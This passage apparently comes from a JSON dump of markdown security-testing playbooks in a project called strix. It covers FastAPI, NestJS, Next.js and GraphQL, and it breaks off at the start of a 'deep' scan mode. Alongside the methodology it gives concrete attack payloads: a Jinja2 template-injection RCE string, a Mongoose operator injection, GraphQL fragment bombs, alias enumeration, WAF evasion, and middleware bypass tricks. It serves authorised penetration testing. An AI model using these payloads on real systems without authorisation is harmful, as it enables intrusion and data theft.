SSE/StreamingResponse\n- BackgroundTasks and task queues\n\n**Deployment**\n- Uvicorn/Gunicorn, reverse proxies/CDN, TLS termination, header trust\n\n## High-Value Targets\n\n- `/openapi.json`, `/docs`, `/redoc` in production (full attack surface map, securitySchemes, server URLs)\n- Auth flows: token endpoints, session/cookie bridges, OAuth device/PKCE\n- Admin/staff routers, feature-flagged routes, `include_in_schema=False` endpoints\n- File upload/download, import/export/report endpoints, signed URL generators\n- WebSocket endpoints (notifications, admin channels, commands)\n- Background job endpoints (`/jobs/{id}`, `/tasks/{id}/result`)\n- Mounted subapps (admin UI, storage browsers, metrics/health)\n\n## Reconnaissance\n\n**OpenAPI Mining**\n```\nGET /openapi.json\nGET /docs\nGET /redoc\nGET /api/openapi.json\nGET /internal/openapi.json\n```\n\nExtract: paths, parameters, securitySchemes, scopes, servers. Endpoints with `include_in_schema=False` won't appearβ€”fuzz based on discovered prefixes and common admin/debug names.\n\n**Dependency Mapping**\n\nFor each route, identify:\n- Router-level dependencies (applied to all routes)\n- Route-level dependencies (per endpoint)\n- Which dependencies enforce auth vs just parse input\n\n## Key Vulnerabilities\n\n### Authentication & Authorization\n\n**Dependency Injection Gaps**\n- Routes missing security dependencies present on other routes\n- `Depends` used instead of `Security` (ignores scope enforcement)\n- Token presence treated as authentication without signature verification\n- `OAuth2PasswordBearer` only yields a token stringβ€”verify routes don't treat presence as auth\n\n**JWT Misuse**\n- Decode without verify: test unsigned tokens, attacker-signed tokens\n- Algorithm confusion: HS256/RS256 cross-use if not pinned\n- `kid` header injection for custom key lookup paths\n- Missing issuer/audience validation, cross-service token reuse\n\n**Session Weaknesses**\n- SessionMiddleware with weak `secret_key`\n- Session fixation via predictable signing\n- Cookie-based auth without CSRF protection\n\n**OAuth/OIDC**\n- Device/PKCE flows: verify strict PKCE S256 and state/nonce enforcement\n\n### Access Control\n\n**IDOR via Dependencies**\n- Object IDs in path/query not validated against caller\n- Tenant headers trusted without binding to authenticated user\n- BackgroundTasks acting on IDs without re-validating ownership at execution time\n- Export/import pipelines with IDOR and cross-tenant leaks\n\n**Scope Bypass**\n- Minimal scope satisfaction (any valid token accepted)\n- Router vs route scope enforcement inconsistency\n\n### Input Handling\n\n**Pydantic Exploitation**\n- Type coercion: strings to ints/bools, empty strings to None, truthiness edge cases\n- Extra fields: `extra = \"allow\"` permits injecting control fields (role, ownerId, scope)\n- Union types and `Annotated`: craft shapes hitting unintended validation branches\n\n**Content-Type Switching**\n```\napplication/json ↔ application/x-www-form-urlencoded ↔ multipart/form-data\n```\nDifferent content types hit different validators or code paths (parser differentials).\n\n**Parameter Manipulation**\n- Case variations in header/cookie names\n- Duplicate parameters exploiting DI precedence\n- Method override via `X-HTTP-Method-Override` (upstream respects, app doesn't)\n\n### CORS & CSRF\n\n**CORS Misconfiguration**\n- Overly broad `allow_origin_regex`\n- Origin reflection without validation\n- Credentialed requests with permissive origins\n- Verify preflight vs actual request deltas\n\n**CSRF Exposure**\n- No built-in CSRF in FastAPI/Starlette\n- Cookie-based auth without origin validation\n- Missing SameSite attribute\n\n### Proxy & Host Trust\n\n**Header Spoofing**\n- ProxyHeadersMiddleware without network boundary: spoof `X-Forwarded-For/Proto` to influence auth/IP gating\n- Absent TrustedHostMiddleware: Host header poisoning in password reset links, absolute URL generation\n- Cache key confusion: missing Vary on Authorization/Cookie/Tenant\n\n### Server-Side Vulnerabilities\n\n**Template Injection (Jinja2)**\n```python\n{{7*7}} # Arithmetic confirmation\n{{cycler.__init__.__globals__['os'].popen('id').read()}} # RCE\n```\nCheck autoescape settings and custom filters/globals.\n\n**SSRF**\n- User-supplied URLs in imports, previews, webhooks validation\n- Test: loopback, RFC1918, IPv6, redirects, DNS rebinding, header control\n- Library behavior (httpx/requests): redirect policy, header forwarding, protocol support\n- Protocol smuggling: `file://`, `ftp://`, gopher-like shims if custom clients\n\n**File Upload**\n- Path traversal in `UploadFile.filename` with control characters\n- Missing storage root enforcement, symlink following\n- Vary filename encodings, dot segments, NUL-like bytes\n- Verify storage paths and served URLs\n\n### WebSocket Security\n\n- Missing per-connection authentication\n- Cross-origin WebSocket without origin validation\n- Topic/channel IDOR (subscribing to other users' channels)\n- Authorization only at handshake, not per-message\n\n### Mounted Apps\n\nSub-apps at `/admin`, `/static`, `/metrics` may bypass global middlewares. Verify auth enforcement parity across all mounts.\n\n### Alternative Stacks\n\n- If GraphQL (Strawberry/Graphene) is mounted: validate resolver-level authorization, IDOR on node/global IDs\n- If SQLModel/SQLAlchemy present: probe for raw query usage and row-level authorization gaps\n\n## Bypass Techniques\n\n- Content-type switching to traverse alternate validators\n- Parameter duplication and case variants exploiting DI precedence\n- Method confusion via proxies (`X-HTTP-Method-Override`)\n- Race windows around dependency-validated state transitions (issue token then mutate with parallel requests)\n\n## Testing Methodology\n\n1. **Enumerate** - Fetch OpenAPI, diff with 404-fuzzing for hidden endpoints\n2. **Matrix testing** - Test each route across: unauth/user/admin Γ— HTTP/WebSocket Γ— JSON/form/multipart\n3. **Dependency analysis** - Map which dependencies enforce auth vs parse input\n4. **Cross-environment** - Compare dev/stage/prod for middleware and docs exposure differences\n5. **Channel consistency** - Verify same authorization on HTTP and WebSocket for equivalent operations\n\n## Validation Requirements\n\n- Side-by-side requests showing unauthorized access (owner vs non-owner, cross-tenant)\n- Cross-channel proof (HTTP and WebSocket for same rule)\n- Header/proxy manipulation showing altered outcomes (Host/XFF/CORS)\n- Minimal payloads for template injection, SSRF, token misuse with safe/OAST oracles\n- Document exact dependency paths (router-level, route-level) that missed enforcement\n" }, { "path": "strix/skills/frameworks/nestjs.md", "content": "---\nname: nestjs\ndescription: Security testing playbook for NestJS applications covering guards, pipes, decorators, module boundaries, and multi-transport auth\n---\n\n# NestJS\n\nSecurity testing for NestJS applications. Focus on guard gaps across decorator stacks, validation pipe bypasses, module boundary leaks, and inconsistent auth enforcement across HTTP, WebSocket, and microservice transports.\n\n## Attack Surface\n\n**Decorator Pipeline**\n- Guards: `@UseGuards`, `CanActivate`, execution context (HTTP/WS/RPC), `Reflector` metadata\n- Pipes: `ValidationPipe` (whitelist, transform, forbidNonWhitelisted), `ParseIntPipe`, custom pipes\n- Interceptors: response mapping, caching, logging, timeout β€” can modify request/response flow\n- Filters: exception filters that may leak information\n- Metadata: `@SetMetadata`, `@Public()`, `@Roles()`, `@Permissions()`\n\n**Module System**\n- `@Module` boundaries, provider scoping (DEFAULT/REQUEST/TRANSIENT)\n- Dynamic modules: `forRoot`/`forRootAsync`, global modules\n- DI container: provider overrides, custom providers\n\n**Controllers & Transports**\n- REST: `@Controller`, versioning (URI/Header/MediaType)\n- GraphQL: `@Resolver`, playground/sandbox exposure\n- WebSocket: `@WebSocketGateway`, gateway guards, room authorization\n- Microservices: TCP, Redis, NATS, MQTT, gRPC, Kafka β€” often lack HTTP-level auth\n\n**Data Layer**\n- TypeORM: repositories, QueryBuilder, raw queries, relations\n- Prisma: `$queryRaw`, `$queryRawUnsafe`\n- Mongoose: operator injection, `$where`, `$regex`\n\n**Auth & Config**\n- `@nestjs/passport` strategies, `@nestjs/jwt`, session-based auth\n- `@nestjs/config`, ConfigService, `.env` files\n- `@nestjs/throttler`, rate limiting with `@SkipThrottle`\n\n**API Documentation**\n- `@nestjs/swagger`: OpenAPI exposure, DTO schemas, auth schemes\n\n## High-Value Targets\n\n- Swagger/OpenAPI endpoints in production (`/api`, `/api-docs`, `/api-json`, `/swagger`)\n- Auth endpoints: login, register, token refresh, password reset, OAuth callbacks\n- Admin controllers decorated with `@Roles('admin')` β€” test with user-level tokens\n- File upload endpoints using `FileInterceptor`/`FilesInterceptor`\n- WebSocket gateways sharing business logic with HTTP controllers\n- Microservice handlers (`@MessagePattern`, `@EventPattern`) β€” often unguarded\n- CRUD generators (`@nestjsx/crud`) with auto-generated endpoints\n- Background jobs and scheduled tasks (`@nestjs/schedule`)\n- Health/metrics endpoints (`@nestjs/terminus`, `/health`, `/metrics`)\n- GraphQL playground/sandbox in production (`/graphql`)\n\n## Reconnaissance\n\n**Swagger Discovery**\n```\nGET /api\nGET /api-docs\nGET /api-json\nGET /swagger\nGET /docs\nGET /v1/api-docs\nGET /api/v2/docs\n```\n\nExtract: paths, parameter schemas, DTOs, auth schemes, example values. Swagger may reveal internal endpoints, deprecated routes, and admin-only paths not visible in the UI.\n\n**Guard Mapping**\n\nFor each controller and method, identify:\n- Global guards (applied in `main.ts` or app module)\n- Controller-level guards (`@UseGuards` on the class)\n- Method-level guards (`@UseGuards` on individual handlers)\n- `@Public()` or `@SkipThrottle()` decorators that bypass protection\n\n## Key Vulnerabilities\n\n### Guard Bypass\n\n**Decorator Stack Gaps**\n- Guards execute: global β†’ controller β†’ method. A method missing `@UseGuards` when siblings have it is the #1 finding.\n- `@Public()` metadata causing global `AuthGuard` to skip enforcement β€” check if applied too broadly.\n- New methods added to existing controllers without inheriting the expected guard.\n\n**ExecutionContext Switching**\n- Guards handling only HTTP context (`getRequest()`) may fail silently on WebSocket or RPC, returning `true` by default.\n- Test same business logic through alternate transports to find context-specific bypasses.\n\n**Reflector Mismatches**\n- Guard reads `SetMetadata('roles', [...])` but decorator sets `'role'` (singular) β€” guard sees no metadata, defaults to allow.\n- `applyDecorators()` compositions accidentally overriding stricter guards with permissive ones.\n\n### Validation Pipe Exploits\n\n**Whitelist Bypass**\n- `whitelist: true` without `forbidNonWhitelisted: true`: extra properties silently stripped but may have been processed by earlier middleware/interceptors.\n- Missing `@Type(() => ChildDto)` on nested objects: `@ValidateNested()` without `@Type` means nested payload is never validated.\n- Array elements: `@IsArray()` doesn't validate elements without `@ValidateNested({ each: true })` and `@Type`.\n\n**Type Coercion**\n- `transform: true` enables implicit coercion: strings β†’ numbers, `\"true\"` β†’ `true`, `\"null\"` β†’ `null`.\n- Exploit truthiness assumptions in business logic downstream.\n\n**Conditional Validation**\n- `@ValidateIf()` and validation groups creating paths where fields skip validation entirely.\n\n**Missing Parse Pipes**\n- `@Param('id')` without `ParseIntPipe`/`ParseUUIDPipe` β€” string values reach ORM queries directly.\n\n### Auth & Passport\n\n**JWT Strategy**\n- Check `ignoreExpiration` is false, `algorithms` is pinned (no `none` or HS/RS confusion)\n- Weak `secretOrKey` values\n- Cross-service token reuse when audience/issuer not enforced\n\n**Passport Strategy Issues**\n- `validate()` return value becomes `req.user` β€” if it returns full DB record, sensitive fields leak downstream\n- Multiple strategies (JWT + session): one may bypass restrictions of the other\n- Custom guards returning `true` for unauthenticated as \"optional auth\"\n\n**Timing Attacks**\n- Plain string comparison instead of bcrypt/argon2 in local strategy\n\n### Serialization Leaks\n\n**Missing ClassSerializerInterceptor**\n- If not applied globally, `@Exclude()` fields (passwords, internal IDs) returned in responses.\n- `@Expose()` with groups: admin-only fields exposed when groups not enforced per-request.\n\n**Circular Relations**\n- Eager-loaded TypeORM/Prisma relations exposing entire object graph without careful serialization.\n\n### Interceptor Abuse\n\n**Cache Poisoning**\n- `CacheInterceptor` without user/tenant identity in cache key β€” responses from one user served to another.\n- Test: authenticated request, then unauthenticated request returning cached data.\n\n**Response Mapping**\n- Transformation interceptors may leak internal entity fields if mapping is incomplete.\n\n### Module Boundary Leaks\n\n**Global Module Exposure**\n- `@Global()` modules expose all providers to every module without explicit imports.\n- Sensitive services (admin operations, internal APIs) accessible from untrusted modules.\n\n**Config Leaks**\n- `forRoot`/`forRootAsync` configuration secrets accessible via `ConfigService` injection in any module.\n\n**Scope Issues**\n- Request-scoped providers (`Scope.REQUEST`) incorrectly scoped as DEFAULT (singleton) β€” request context leaks across concurrent requests.\n\n### WebSocket Gateway\n\n- HTTP guards don't automatically apply to WebSocket gateways β€” `@UseGuards` must be explicit.\n- Authentication deferred from `handleConnection` to message handlers allows unauthenticated message sending.\n- Room/namespace authorization: users joining rooms they shouldn't access.\n- `@SubscribeMessage()` handlers relying on connection-level auth instead of per-message validation.\n\n### Microservice Transport\n\n- `@MessagePattern`/`@EventPattern` handlers often lack guards (considered \"internal\").\n- If transport (Redis, NATS, Kafka) is network-accessible, messages can be injected bypassing all HTTP security.\n- `ValidationPipe` may only be configured for HTTP β€” microservice payloads skip validation.\n\n### ORM Injection\n\n**TypeORM**\n- `QueryBuilder` and `.query()` with template literal interpolation β†’ SQL injection.\n- Relations: API allowing specification of which relations to load via query params.\n\n**Mongoose**\n- Query operator injection: `{ password: { $gt: \"\" } }` via unsanitized request body.\n- `$where` and `$regex` operators from user input.\n\n**Prisma**\n- `$queryRaw`/`$executeRaw` with string interpolation (but not tagged template).\n- `$queryRawUnsafe` usage.\n\n### Rate Limiting\n\n- `@SkipThrottle()` on sensitive endpoints (login, password reset, OTP).\n- In-memory throttler storage: resets on restart, doesn't work across instances.\n- Behind proxy without `trust proxy`: all requests share same IP, or header spoofable.\n\n### CRUD Generators\n\n- Auto-generated CRUD endpoints may not inherit manual guard configurations.\n- Bulk operations (`createMany`, `updateMany`) bypassing per-entity authorization.\n- Query parameter injection in CRUD libraries: `filter`, `sort`, `join`, `select` exposing unauthorized data.\n\n## Bypass Techniques\n\n- `@Public()` / skip-metadata applied via composed decorators at method level causing global guards to skip via `Reflector` metadata checks\n- Route param pollution: `/users/123?id=456` β€” which `id` wins in guards vs handlers?\n- Version routing: v1 of endpoint may still be registered without the guard added to v2\n- `X-HTTP-Method-Override` or `_method` processed by Express before guards\n- Content-type switching: `application/x-www-form-urlencoded` instead of JSON to bypass JSON-specific validation\n- Exception filter differences: guard throwing results in generic error that leaks route existence info\n\n## Testing Methodology\n\n1. **Enumerate** β€” Fetch Swagger/OpenAPI, map all controllers, resolvers, and gateways\n2. **Guard audit** β€” Map decorator stack per method: which guards, pipes, interceptors are applied at each level\n3. **Matrix testing** β€” Test each endpoint across: unauth/user/admin Γ— HTTP/WS/microservice\n4. **Validation probing** β€” Send extra fields, wrong types, nested objects, arrays to find pipe gaps\n5. **Transport parity** β€” Same operation via HTTP, WebSocket, and microservice transport\n6. **Module boundaries** β€” Check if providers from one module are accessible without proper imports\n7. **Serialization check** β€” Compare raw entity fields with API response fields\n\n## Validation Requirements\n\n- Guard bypass: request to guarded endpoint succeeding without auth, showing guard chain break point\n- Validation bypass: payload with extra/malformed fields affecting business logic\n- Cross-transport inconsistency: same action authorized via HTTP but exploitable via WebSocket/microservice\n- Module boundary leak: accessing provider or data across unauthorized module boundaries\n- Serialization leak: response containing excluded fields (passwords, internal metadata)\n- IDOR: side-by-side requests from different users showing unauthorized data access\n- ORM injection: raw query with user-controlled input returning unauthorized data, or error-based evidence of query structure\n- Cache poisoning: response from unauthenticated or different-user request matching a prior authenticated user's cached response\n" }, { "path": "strix/skills/frameworks/nextjs.md", "content": "---\nname: nextjs\ndescription: Security testing playbook for Next.js covering App Router, Server Actions, RSC, and Edge runtime vulnerabilities\n---\n\n# Next.js\n\nSecurity testing for Next.js applications. Focus on authorization drift across runtimes (Edge/Node), caching boundaries, server actions, and middleware bypass.\n\n## Attack Surface\n\n**Routers**\n- App Router (`app/`) and Pages Router (`pages/`) often coexist\n- Route Handlers (`app/api/**`) and API routes (`pages/api/**`)\n- Middleware: `middleware.ts` at project root\n\n**Runtimes**\n- Node.js (full API access)\n- Edge (V8 isolates, restricted APIs)\n\n**Rendering & Caching**\n- SSR, SSG, ISR, on-demand revalidation\n- RSC (React Server Components) with fetch cache\n- Draft/preview mode\n\n**Data Paths**\n- Server Components, Client Components\n- Server Actions (streamed POST with `Next-Action` header)\n- `getServerSideProps`, `getStaticProps`\n\n**Integrations**\n- NextAuth.js (callbacks, CSRF, callbackUrl)\n- `next/image` optimization and remote loaders\n\n## High-Value Targets\n\n- Middleware-protected routes (auth, geo, A/B)\n- Admin/staff paths, draft/preview content, on-demand revalidate endpoints\n- RSC payloads and flight data, streamed responses\n- Image optimizer and custom loaders, remotePatterns/domains\n- NextAuth callbacks (`/api/auth/callback/*`), sign-in providers\n- Edge-only features (bot protection, IP gates) and their Node equivalents\n\n## Reconnaissance\n\n**Route Discovery**\n\n```javascript\n// Browser console - list all routes\nconsole.log(__BUILD_MANIFEST.sortedPages.join('\\n'))\n\n// Inspect server-fetched data\nJSON.parse(document.getElementById('__NEXT_DATA__').textContent).props.pageProps\n\n// List public environment variables\nObject.keys(process.env).filter(k => k.startsWith('NEXT_PUBLIC_'))\n```\n\n**Build Artifacts**\n```\nGET /_next/static//_buildManifest.js\nGET /_next/static//_ssgManifest.js\nGET /_next/static/chunks/pages/\nGET /_next/static/chunks/app/\n```\nChunk filenames map to routes (e.g., `admin.js` β†’ `/admin`).\n\n**Source Maps**\n\nCheck `/_next/static/` for exposed `.map` files revealing route structure, server action IDs, and internal functions.\n\n**Client Bundle Mining**\n\nSearch main-*.js for: `pathname:`, `href:`, `__next_route__`, `serverActions`, API endpoints. Grep for `API_KEY`, `SECRET`, `TOKEN`, `PASSWORD` to find accidentally leaked credentials.\n\n**Server Action Discovery**\n\nInspect Network tab for POST requests with `Next-Action` header. Extract action IDs from response streams and hydration data.\n\n**Additional Leakage**\n- `/sitemap.xml`, `/robots.txt`, `/sitemap-*.xml` for unintended admin/internal/preview paths\n- Client bundles/env for secret paths and preview/admin flags (many teams hide routes via UI only)\n\n## Key Vulnerabilities\n\n### Middleware Bypass\n\n**Known Techniques**\n- `x-middleware-subrequest` header crafting (CVE-class bypass)\n- `x-nextjs-data` probing\n- Look for 307 + `x-middleware-rewrite`/`x-nextjs-redirect` headers\n\n**Path Normalization**\n```\n/api/users\n/api/users/\n/api//users\n/api/./users\n```\nMiddleware may normalize differently than route handlers. Test double slashes, trailing slashes, dot segments.\n\n**Parameter Pollution**\n```\n?id=1&id=2\n?filter[]=a&filter[]=b\n```\nMiddleware checks first value, handler uses last or array.\n\n### Server Actions\n\n- Invoke actions outside UI flow with alternate content-types\n- Authorization assumed from client state rather than enforced server-side\n- IDOR via object references in action payloads\n- Map action IDs from source maps to discover hidden actions\n\n### RSC & Caching\n\n**Cache Boundary Failures**\n- User-bound data cached without identity keys (ETag/Set-Cookie unaware)\n- Personalized content served from shared cache/CDN\n- Missing `no-store` on sensitive fetches\n\n**Flight Data Leakage**\n\nInspect streamed RSC payloads for serialized sensitive fields in props.\n\n**ISR Issues**\n- Stale-while-revalidate responses containing user-specific or tenant-dependent data\n- Weak secrets in on-demand revalidation endpoint URLs\n- Referer-disclosed tokens or unvalidated hosts triggering `revalidatePath`/`revalidateTag`\n- Header-smuggling or method variations to trigger revalidation\n\n### Authentication\n\n**NextAuth Pitfalls**\n- Missing/relaxed state/nonce/PKCE per provider (login CSRF, token mix-up)\n- Open redirect in `callbackUrl` or mis-scoped allowed hosts\n- JWT audience/issuer not enforced across routes\n- Cross-service token reuse\n- Session hijacking by forcing callbacks\n\n**Session Boundaries**\n- Different auth enforcement between App Router and Pages Router\n- API routes vs Route Handlers authorization inconsistency\n\n### Data Exposure\n\n**__NEXT_DATA__ Over-fetching**\n\nServer-fetched data passed to client but not rendered:\n- Full user objects when only username needed\n- Internal IDs, tokens, admin-only fields\n- ORM select-all patterns exposing entire records\n- API responses forwarded without sanitization (metadata, cursors, debug info)\n\n**Environment-Dependent Exposure**\n- Staging/dev accidentally exposes more fields than production\n- Inconsistent serialization logic across environments\n\n**Props Inspection**\n```javascript\n// Check for sensitive data in page props\nJSON.parse(document.getElementById('__NEXT_DATA__').textContent).props\n```\nLook for `_metadata`, `_internal`, `__typename` (GraphQL), nested sensitive objects.\n\n### Image Optimizer SSRF\n\n**Remote Patterns**\n- Broad `images.domains`/`remotePatterns` in `next.config.js`\n- Test: internal hosts, IPv4/IPv6 variants, DNS rebinding\n\n**Custom Loaders**\n- Protocol smuggling via redirect chains\n- Cache poisoning via URL normalization differences affecting other users\n\n### Runtime Divergence\n\n**Edge vs Node**\n- Defenses relying on Node-only modules skipped on Edge\n- Header trust differs (`x-forwarded-*` handling)\n- Same route may behave differently across runtimes\n\n### Client-Side\n\n**XSS Vectors**\n- `dangerouslySetInnerHTML`\n- Markdown renderers\n- User-controlled href/src attributes\n- Validate CSP/Trusted Types coverage for SSR/CSR/hydration\n\n**Hydration Mismatches**\n\nServer vs client render differences can enable gadget-based XSS.\n\n### Draft/Preview Mode\n\n- Secret URLs/cookies enabling preview\n- Preview secrets leaked in client bundles/env\n- Setting preview cookies from subdomains or via open redirects\n\n## Bypass Techniques\n\n- Content-type switching: `application/json` ↔ `multipart/form-data` ↔ `application/x-www-form-urlencoded`\n- Method override: `_method`, `X-HTTP-Method-Override`, GET on endpoints accepting writes\n- Case/param aliasing and query duplication affecting middleware vs handler parsing\n- Cache key confusion at CDN/proxy (lack of Vary on auth cookies/headers)\n\n## Testing Methodology\n\n1. **Enumerate** - Use `__BUILD_MANIFEST`, source maps, build artifacts, sitemap/robots to map all routes\n2. **Runtime matrix** - Test each route under Edge and Node runtimes\n3. **Role matrix** - Test as unauth/user/admin across SSR, API routes, Route Handlers, Server Actions\n4. **Cache probing** - Verify caching respects identity (strip cookies, alter Vary headers, check ETags)\n5. **Middleware validation** - Test path variants and header manipulation for bypass\n6. **Cross-router** - Compare authorization between App Router and Pages Router paths\n\n## Validation Requirements\n\n- Side-by-side requests showing cross-user/tenant access\n- Cache boundary failure proof (response diffs, ETag collisions)\n- Server action invocation outside UI with insufficient auth\n- Middleware bypass with explicit headers showing protected content access\n- Runtime parity checks (Edge vs Node inconsistent enforcement)\n- Discovered routes verified as deployed (200/403) not just build artifacts (404)\n- Leaked credentials tested with minimal read-only calls; filter placeholders\n- `__NEXT_DATA__` exposure: verify cross-user (User A's props shouldn't contain User B's PII), confirm exposed fields not in DOM\n- Path normalization bypasses: show differential responses (403 vs 200), redirects don't count\n" }, { "path": "strix/skills/protocols/graphql.md", "content": "---\nname: graphql\ndescription: GraphQL security testing covering introspection, resolver injection, batching attacks, and authorization bypass\n---\n\n# GraphQL\n\nSecurity testing for GraphQL APIs. Focus on resolver-level authorization, field/edge access control, batching abuse, and federation trust boundaries.\n\n## Attack Surface\n\n**Operations**\n- Queries, mutations, subscriptions\n- Persisted queries / Automatic Persisted Queries (APQ)\n\n**Transports**\n- HTTP POST/GET with `application/json` or `application/graphql`\n- WebSocket: graphql-ws, graphql-transport-ws protocols\n- Multipart for file uploads\n\n**Schema Features**\n- Introspection (`__schema`, `__type`)\n- Directives: `@defer`, `@stream`, custom auth directives (@auth, @private)\n- Custom scalars: Upload, JSON, DateTime\n- Relay: global node IDs, connections/cursors, interfaces/unions\n\n**Architecture**\n- Federation (Apollo, GraphQL Mesh): `_service`, `_entities`\n- Gateway vs subgraph authorization boundaries\n\n## Reconnaissance\n\n**Endpoint Discovery**\n```\nPOST /graphql {\"query\":\"{__typename}\"}\nPOST /api/graphql {\"query\":\"{__typename}\"}\nPOST /v1/graphql {\"query\":\"{__typename}\"}\nPOST /gql {\"query\":\"{__typename}\"}\nGET /graphql?query={__typename}\n```\n\nCheck for GraphiQL/Playground exposure with credentials enabled (cross-origin with cookies can leak data via postMessage bridges).\n\n**Schema Acquisition**\n\nIf introspection enabled:\n```graphql\n{__schema{types{name fields{name args{name}}}}}\n```\n\nIf disabled, infer schema via:\n- `__typename` probes on candidate fields\n- Field suggestion errors (submit near-miss names to harvest suggestions)\n- \"Expected one of\" errors revealing enum values\n- Type coercion errors exposing field structure\n- Error taxonomy: different codes for \"unknown field\" vs \"unauthorized field\" reveal existence\n\n**Schema Mapping**\n\nMap: root operations, object types, interfaces/unions, directives, custom scalars. Identify sensitive fields: email, tokens, roles, billing, API keys, admin flags, file URLs. Note cascade paths where child resolvers may skip auth under parent assumptions.\n\n## Key Vulnerabilities\n\n### Authorization Bypass\n\n**Field-Level IDOR**\n\nTest with aliases comparing owned vs foreign objects in single request:\n```graphql\nquery {\n own: order(id:\"OWNED_ID\") { id total owner { email } }\n foreign: order(id:\"FOREIGN_ID\") { id total owner { email } }\n}\n```\n\n**Edge/Child Resolver Gaps**\n\nParent resolver checks auth, child resolver assumes it's already validated:\n```graphql\nquery {\n user(id:\"FOREIGN\") {\n id\n privateData { secrets } # Child may skip auth check\n }\n}\n```\n\n**Relay Node Resolution**\n\nDecode base64 global IDs, swap type/id pairs:\n```graphql\nquery {\n node(id:\"VXNlcjoxMjM=\") { ... on User { email } }\n}\n```\nEnsure per-type authorization is enforced inside resolvers. Verify connection filters (owner/tenant) apply before pagination; cursor tampering should not cross ownership boundaries.\n\n**Mutation Bypass**\n- Probe mutations for partial updates bypassing validation (JSON Merge Patch semantics)\n- Test mutations that accept extra fields passed to downstream logic\n\n### Batching & Alias Abuse\n\n**Enumeration via Aliases**\n```graphql\nquery {\n u1:user(id:\"1\"){email}\n u2:user(id:\"2\"){email}\n u3:user(id:\"3\"){email}\n}\n```\nBypasses per-request rate limits; exposes per-field vs per-request auth inconsistencies.\n\n**Array Batching**\n\nIf supported (non-standard), submit multiple operations to achieve partial failures and bypass limits.\n\n### Input Manipulation\n\n**Type Confusion**\n```\n{id: 123} vs {id: \"123\"}\n{id: [123]} vs {id: null}\n{id: 0} vs {id: -1}\n```\n\n**Duplicate Keys**\n```json\n{\"id\": 1, \"id\": 2}\n```\nParser precedence varies; may bypass validation. Also test default argument values.\n\n**Extra Fields**\n\nSend unexpected keys in input objects; backends may pass them to resolvers or downstream logic.\n\n### Cursor Manipulation\n\nDecode cursors (usually base64) to:\n- Manipulate offsets/IDs\n- Skip filters\n- Cross ownership boundaries\n\n### Directive Abuse\n\n**@defer/@stream**\n```graphql\nquery {\n me { id }\n ... @defer { adminPanel { secrets } }\n}\n```\nMay return gated data in incremental delivery. Confirm server supports incremental delivery.\n\n**Custom Directives**\n\n@auth, @private and similar directives often annotate intent but do not enforceβ€”verify actual checks in each resolver path.\n\n### Complexity Attacks\n\n**Fragment Bombs**\n```graphql\nfragment x on User { friends { ...x } }\nquery { me { ...x } }\n```\nTest depth/complexity limits, query cost analyzers, timeouts.\n\n**Wide Selection Sets**\n\nAbuse selection sets and fragments to force overfetching of sensitive subfields.\n\n### Federation Exploitation\n\n**SDL Exposure**\n```graphql\nquery { _service { sdl } }\n```\n\n**Entity Materialization**\n```graphql\nquery {\n _entities(representations:[\n {__typename:\"User\", id:\"TARGET_ID\"}\n ]) { ... on User { email roles } }\n}\n```\nGateway may enforce auth; subgraph resolvers may not. Look for cross-subgraph IDOR via inconsistent ownership checks.\n\n### Subscription Security\n\n- Authorization at handshake only, not per-message\n- Subscribe to other users' channels via filter args\n- Cross-tenant event leakage\n- Abuse filter args in subscription resolvers to reference foreign IDs\n\n### Persisted Query Abuse\n\n- APQ hashes leaked from client bundles\n- Replay privileged operations with attacker variables\n- Hash bruteforce for common operations\n- Validate hashβ†’operation mapping enforces principal and operation allowlists\n\n### CORS & CSRF\n\n- Cookie-auth with GET queries enables CSRF on mutations via query parameters\n- GraphiQL/Playground cross-origin with credentials leaks data\n- Missing SameSite and origin validation\n\n### File Uploads\n\nGraphQL multipart spec:\n- Multiple Upload scalars\n- Filename/path traversal tricks\n- Unexpected content-types, oversize chunks\n- Server-side ownership/scoping for returned URLs\n\n## WAF Evasion\n\n**Query Reshaping**\n- Comments and block strings (`\"\"\"...\"\"\"`)\n- Unicode escapes\n- Alias/fragment indirection\n- JSON variables vs inline args\n- GET vs POST vs `application/graphql`\n\n**Fragment Splitting**\n\nSplit fields across fragments and inline spreads to avoid naive signatures:\n```graphql\nfragment a on User { email }\nfragment b on User { password }\nquery { me { ...a ...b } }\n```\n\n## Bypass Techniques\n\n**Transport Switching**\n```\nContent-Type: application/json\nContent-Type: application/graphql\nContent-Type: multipart/form-data\nGET with query params\n```\n\n**Timing & Rate Limits**\n- HTTP/2 multiplexing and connection reuse to widen timing windows\n- Batching to bypass rate limits\n\n**Naming Tricks**\n- Case/underscore variations\n- Unicode homoglyphs (server-dependent)\n- Aliases masking sensitive field names\n\n**Cache Confusion**\n- CDN caching without Vary on Authorization\n- Variable manipulation affecting cache keys\n- Redirects and 304/206 behaviors leaking partial responses\n\n## Testing Methodology\n\n1. **Fingerprint** - Identify endpoints, transports, stack (Apollo, Hasura, etc.), GraphiQL exposure\n2. **Schema mapping** - Introspection or inference to build complete type graph\n3. **Principal matrix** - Collect tokens for unauth, user, premium, admin roles with at least one valid object ID per subject\n4. **Field sweep** - Test each resolver with owned vs foreign IDs via aliases in same request\n5. **Transport parity** - Verify same auth on HTTP, WebSocket, persisted queries\n6. **Federation probe** - Test `_service` and `_entities` for subgraph auth gaps\n7. **Edge cases** - Cursors, @defer/@stream, subscriptions, file uploads\n\n## Validation Requirements\n\n- Paired requests (owner vs non-owner) showing unauthorized access\n- Resolver-level bypass: parent checks present, child field exposes data\n- Transport parity proof: HTTP and WebSocket for same operation\n- Federation bypass: `_entities` accessing data without subgraph auth\n- Minimal payloads with exact selection sets and variable shapes\n- Document exact resolver paths that missed enforcement\n" }, { "path": "strix/skills/reconnaissance/.gitkeep", "content": "" }, { "path": "strix/skills/scan_modes/deep.md", "content": "---\nname: deep\ndescription: Exhaustive security assessment with maximum coverage, depth, and vulnerability chaining\n---\n\n# Deep Testing Mode\n\nExhaustive security assessment. Maximum coverage, maximum depth. Finding what others miss is the goal.\n\n## Approach\n\nThorough understanding before exploitation. Test every parameter, every endpoint, every edge case. Chain findings for maximum impact.\n\n## Phase 1: Exhaustive Reconnaissance\n\n**Whitebox (source available)**\n- Map every file, module, and code path in the repository\n- Trace all entry points from HTTP handlers to database queries\n- Document all authentication mechanisms and implementations\n- Map authorization checks and access control model\n- Identify all external service integrations and API calls\n- Analyze configuration for secrets and misconfigurations\n- Review database schemas and data relationships\n- Map background jobs, cron tasks, async processing\n- Identify all serialization/deserialization points\n- Review file handling: upload, download, processing\n- Understand the deployment model and infrastructure assumptions\n- Check all dependency versions against CVE databases\n\n**Blackbox (no source)**\n- Exhaustive subdomain enumeration with multiple sources 